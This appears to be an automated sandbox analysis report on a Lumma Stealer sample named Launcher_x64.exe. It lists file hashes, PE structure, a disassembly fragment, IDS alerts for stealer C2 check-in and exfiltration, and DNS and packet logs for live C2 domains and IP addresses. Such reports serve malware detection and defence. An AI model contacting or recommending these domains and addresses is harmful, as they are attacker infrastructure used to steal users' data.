                                                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      external.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      Full_Ver_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      winwidgetshp.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                                      No context
Process: C:\Users\user\Desktop\Launcher_x64.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 8
Entropy (8bit): 3.0
Encrypted: false
SSDEEP: 3:OP5n:Ox
MD5: 32EB8D44A0938FBB8E8E87029CA719D8
SHA1: 13856311E78A959973D96B17544931AF22347E61
SHA-256: C769F4AA36C38983F94D6F4599EE0A3623EC8D244969B9A1E4F4B91E86C0FF9F
SHA-512: A6895D557270E69BE20349875587783B310B1B5A6922643FEA92875AD3D0899BB7B08F6F2206DE97194DA6DB9DDA1DC4AAE7759ED5684D18B36B9ECEDF0EAEDC
Malicious: false
Reputation: low
Preview: Enjoy!..
File type: PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit): 7.528630059997768
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Launcher_x64.exe
File size: 575'488 bytes
MD5: a467477e289901e8c45912f98fc56cd2
SHA1: 15be8446db31a669ee930bedf992ef558b121f7f
SHA256: 6a8a3c7873b18093245e953808bef419d56ba8d103eab96d276111ef59992c6f
SHA512: 3258d0d391def6a9a5da0385f6913a34c8df97c4669db14f5aa9516d2e2c619a40fbac5fa3db47f9caf9283f08763ea8b63d53f40933bdff41a92fcc0bc4b234
SSDEEP: 12288:dRIomkRJWzi7X+UeyZAU2kMCasPakyFqb80b0akd5:de/kRJWzib+UnApkasHyFKJbwd5
TLSH: 52C4D1017541C073DDA722B364BAD7AA4629F9100F626ACFA3580DBDDF351D1AB32B27
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....hg.........."......(...........p............@.......................... ............@.....................................<..
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x4170bb
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
Time Stamp: 0x676819F1 [Sun Dec 22 13:53:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 1f5f01fd52677b24724028ad24992aa9
Instruction
call 00007F06D0D372EAh
jmp 00007F06D0D37159h
mov ecx, dword ptr [00440700h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007F06D0D372E6h
test esi, ecx
jne 00007F06D0D37308h
call 00007F06D0D37311h
mov ecx, eax
cmp ecx, edi
jne 00007F06D0D372E9h
mov ecx, BB40E64Fh
jmp 00007F06D0D372F0h
test esi, ecx
jne 00007F06D0D372ECh
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [00440700h], ecx
not ecx
pop edi
mov dword ptr [00440740h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [0043D914h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [0043D8CCh]
xor dword ptr [ebp-04h], eax
call dword ptr [0043D8C8h]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [0043D964h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 00441E50h
call dword ptr [0043D93Ch]
ret
push 00030000h
push 00010000h
push 00000000h
call 00007F06D0D3E918h
add esp, 0Ch
| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d6b4 | 0x3c | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x91000 | 0x3e8 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x44000 | 0x2324 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x39968 | 0x18 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x35cf8 | 0xc0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x3d860 | 0x170 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| .text | 0x1000 | 0x326cc | 0x32800 | ccc71f71555262d04b28eeb13f33c694 | False | 0.5078125 | data | 6.449171689149143 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x34000 | 0xad9c | 0xae00 | 265ca2e098c45dacae5fa86d5b3aa7cb | False | 0.4167789152298851 | locale data table | 4.866718139159974 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x3f000 | 0x3618 | 0x2600 | 34a18fbac611bd450c331e8e8b0fc570 | False | 0.31270559210526316 | data | 5.125689677633356 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .tls | 0x43000 | 0x9 | 0x200 | 1f354d76203061bfdd5a53dae48d5435 | False | 0.033203125 | data | 0.020393135236084953 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .reloc | 0x44000 | 0x2324 | 0x2400 | a5356144ed5fdf31d774488bfaa21264 | False | 0.7392578125 | data | 6.496424389763303 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| .bss | 0x47000 | 0x49c00 | 0x49c00 | ae225876e09ff8a537f78908156a8879 | False | 1.0003343485169491 | OpenPGP Secret Key | 7.999366161518412 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x91000 | 0x3e8 | 0x400 | 64acc37535b725263869df252fd47b49 | False | 0.43359375 | data | 3.281274144562883 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| --- | --- | --- | --- | --- | --- | --- |
| RT_VERSION | 0x91058 | 0x390 | data | English | United States | 0.4517543859649123 |
| DLL | Import |
| --- | --- |
| KERNEL32.dll | AcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CompareStringW, CreateFileW, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile |
| USER32.dll | DefWindowProcW |
| Language of compilation system | Country where language is spoken | Map |
| --- | --- | --- |
| English | United States | |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| 2024-12-23T01:17:04.741497+0100 | 2058212 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bellflamre .click) | 1 | 192.168.2.4 | 61902 | 1.1.1.1 | 53 | UDP |
| 2024-12-23T01:17:36.641324+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49730 | 193.143.1.9 | 443 | TCP |
| 2024-12-23T01:18:08.625788+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49737 | 193.143.1.9 | 443 | TCP |
| 2024-12-23T01:18:11.813791+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49765 | 23.55.153.106 | 443 | TCP |
| 2024-12-23T01:18:12.592732+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.4 | 49765 | 23.55.153.106 | 443 | TCP |
| 2024-12-23T01:18:14.333543+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49772 | 172.67.157.254 | 443 | TCP |
| 2024-12-23T01:18:14.989615+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49772 | 172.67.157.254 | 443 | TCP |
| 2024-12-23T01:18:14.989615+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49772 | 172.67.157.254 | 443 | TCP |
| 2024-12-23T01:18:16.240837+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49777 | 172.67.157.254 | 443 | TCP |
| 2024-12-23T01:18:17.048776+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49777 | 172.67.157.254 | 443 | TCP |
| 2024-12-23T01:18:17.048776+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49777 | 172.67.157.254 | 443 | TCP |
| 2024-12-23T01:18:18.700426+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49784 | 172.67.157.254 | 443 | TCP |
| 2024-12-23T01:18:19.696798+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49784 | 172.67.157.254 | 443 | TCP |
| 2024-12-23T01:18:21.007739+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49790 | 172.67.157.254 | 443 | TCP |
| 2024-12-23T01:18:23.182176+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49795 | 172.67.157.254 | 443 | TCP |
| 2024-12-23T01:18:25.967597+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49801 | 172.67.157.254 | 443 | TCP |
| 2024-12-23T01:18:28.978081+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49807 | 172.67.157.254 | 443 | TCP |
| 2024-12-23T01:18:32.629372+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49818 | 172.67.157.254 | 443 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:16.244323969 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:16.244417906 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:16.244450092 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.048773050 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.048820972 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.048851013 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.048882008 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.048909903 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.048932076 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.048938036 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.048969984 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.048994064 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.048994064 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.058931112 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.058989048 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.058999062 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.067791939 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.067842960 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.067852974 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.110075951 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.168405056 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.219393969 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.240679979 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.244445086 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.244474888 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.244504929 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.244522095 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.244577885 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.244586945 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.244601965 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.244647980 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.244772911 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.244786024 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.244810104 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.244816065 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.486963034 CET49784443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.487013102 CET44349784172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.487092018 CET49784443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.487531900 CET49784443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.487545967 CET44349784172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:18.700272083 CET44349784172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:18.700426102 CET49784443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:18.702168941 CET49784443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:18.702178001 CET44349784172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:18.702421904 CET44349784172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:18.705090046 CET49784443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:18.705286026 CET49784443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:18.705316067 CET44349784172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:18.705384970 CET49784443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:18.705393076 CET44349784172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:19.696809053 CET44349784172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:19.696902037 CET44349784172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:19.696962118 CET49784443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:19.697150946 CET49784443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:19.697185993 CET44349784172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:19.795064926 CET49790443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:19.795125961 CET44349790172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:19.795221090 CET49790443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:19.795620918 CET49790443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:19.795639992 CET44349790172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.007531881 CET44349790172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.007739067 CET49790443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.009485006 CET49790443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.009496927 CET44349790172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.009727955 CET44349790172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.011373997 CET49790443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.011512041 CET49790443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.011543989 CET44349790172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.687660933 CET44349790172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.687752962 CET44349790172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.687802076 CET49790443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.687994003 CET49790443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.688009024 CET44349790172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.965187073 CET49795443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.965229034 CET44349795172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.965377092 CET49795443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.965850115 CET49795443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.965866089 CET44349795172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:23.182028055 CET44349795172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:23.182176113 CET49795443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:23.183936119 CET49795443192.168.2.4172.67.157.254
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Dec 23, 2024 01:17:04.741497040 CET | 192.168.2.4 | 1.1.1.1 | 0xcb77 | Standard query (0) | bellflamre.click | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 01:17:04.986202955 CET | 192.168.2.4 | 1.1.1.1 | 0x27e7 | Standard query (0) | sendypaster.xyz | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 01:17:36.644941092 CET | 192.168.2.4 | 1.1.1.1 | 0x3be8 | Standard query (0) | steppriflej.xyz | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 01:18:08.627518892 CET | 192.168.2.4 | 1.1.1.1 | 0x46dc | Standard query (0) | greywe-snotty.cyou | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 01:18:08.936219931 CET | 192.168.2.4 | 1.1.1.1 | 0x14e2 | Standard query (0) | supporse-comment.cyou | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 01:18:09.164871931 CET | 192.168.2.4 | 1.1.1.1 | 0x27f1 | Standard query (0) | smash-boiling.cyou | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 01:18:09.417371988 CET | 192.168.2.4 | 1.1.1.1 | 0xbbb7 | Standard query (0) | ripe-blade.cyou | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 01:18:09.807132959 CET | 192.168.2.4 | 1.1.1.1 | 0xb5f7 | Standard query (0) | hosue-billowy.cyou | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 01:18:10.029934883 CET | 192.168.2.4 | 1.1.1.1 | 0x335b | Standard query (0) | pollution-raker.cyou | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 01:18:10.282677889 CET | 192.168.2.4 | 1.1.1.1 | 0xf65e | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 01:18:12.832012892 CET | 192.168.2.4 | 1.1.1.1 | 0x2885 | Standard query (0) | lev-tolstoi.com | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Dec 23, 2024 01:17:04.983486891 CET | 1.1.1.1 | 192.168.2.4 | 0xcb77 | Name error (3) | bellflamre.click | none | none | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 01:17:05.254189014 CET | 1.1.1.1 | 192.168.2.4 | 0x27e7 | No error (0) | sendypaster.xyz | | 193.143.1.9 | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 01:17:37.035268068 CET | 1.1.1.1 | 192.168.2.4 | 0x3be8 | No error (0) | steppriflej.xyz | | 193.143.1.9 | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 01:18:08.932070017 CET | 1.1.1.1 | 192.168.2.4 | 0x46dc | Name error (3) | greywe-snotty.cyou | none | none | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 01:18:09.160857916 CET | 1.1.1.1 | 192.168.2.4 | 0x14e2 | Name error (3) | supporse-comment.cyou | none | none | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 01:18:09.413908005 CET | 1.1.1.1 | 192.168.2.4 | 0x27f1 | Name error (3) | smash-boiling.cyou | none | none | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 01:18:09.804028034 CET | 1.1.1.1 | 192.168.2.4 | 0xbbb7 | Name error (3) | ripe-blade.cyou | none | none | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 01:18:10.026997089 CET | 1.1.1.1 | 192.168.2.4 | 0xb5f7 | Name error (3) | hosue-billowy.cyou | none | none | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 01:18:10.279098988 CET | 1.1.1.1 | 192.168.2.4 | 0x335b | Name error (3) | pollution-raker.cyou | none | none | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 01:18:10.420705080 CET | 1.1.1.1 | 192.168.2.4 | 0xf65e | No error (0) | steamcommunity.com | | 23.55.153.106 | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 01:18:13.051553011 CET | 1.1.1.1 | 192.168.2.4 | 0x2885 | No error (0) | lev-tolstoi.com | | 172.67.157.254 | A (IP address) | IN (0x0001) | false |
| Dec 23, 2024 01:18:13.051553011 CET | 1.1.1.1 | 192.168.2.4 | 0x2885 | No error (0) | lev-tolstoi.com | | 104.21.66.86 | A (IP address) | IN (0x0001) | false |
• steamcommunity.com
• lev-tolstoi.com

| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 0 | 192.168.2.4 | 49765 | 23.55.153.106 | 443 | 3336 | C:\Users\user\Desktop\Launcher_x64.exe |
Timestamp | Bytes transferred | Direction | Data
